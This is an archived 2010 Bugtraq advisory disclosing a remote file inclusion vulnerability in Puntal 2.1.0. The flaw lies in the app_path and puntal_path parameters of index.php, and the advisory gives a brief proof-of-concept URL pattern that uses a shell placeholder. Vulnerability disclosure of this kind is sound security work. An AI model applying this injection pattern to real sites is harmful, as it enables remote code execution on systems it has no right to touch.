| New User, Welcome! Login |
Puntal (index.php) Remote File Inclusion Vulnerabilities
| From: |
eidelweiss cyberservices com |
| To: |
bugtraq securityfocus com |
| Cc: |
|
| Subject: |
Puntal (index.php) Remote File Inclusion Vulnerabilities |
| Date: |
Mon - May 03, 2010 11:25 AM |
Puntal could allow a remote attacker to include malicious PHP files. A remote attacker could send a specially-crafted URL request to the "index.php" script using the "app_path=" OR "puntal_path=" parameter to specify a malicious PHP file from a remote system, which would allow the attacker to execute arbitrary code on the vulnerable system.
Puntal 2.1.0 is vulnerable; other versions may also be affected.
An attacker can exploit these issues via a browser.
-=[P0C]=-
http://127.0.0.1//path/index.php?app_path= [inj3ct0r sh3ll]
or
http://127.0.0.1//path/index.php?puntal_path= [inj3ct0r sh3ll
|
|
|
Copyright © 1995-2012 LinuxRocket.net. All rights reserved.
Nearly all of LinuxRocket's features are free. Be kind and donate to the cause!
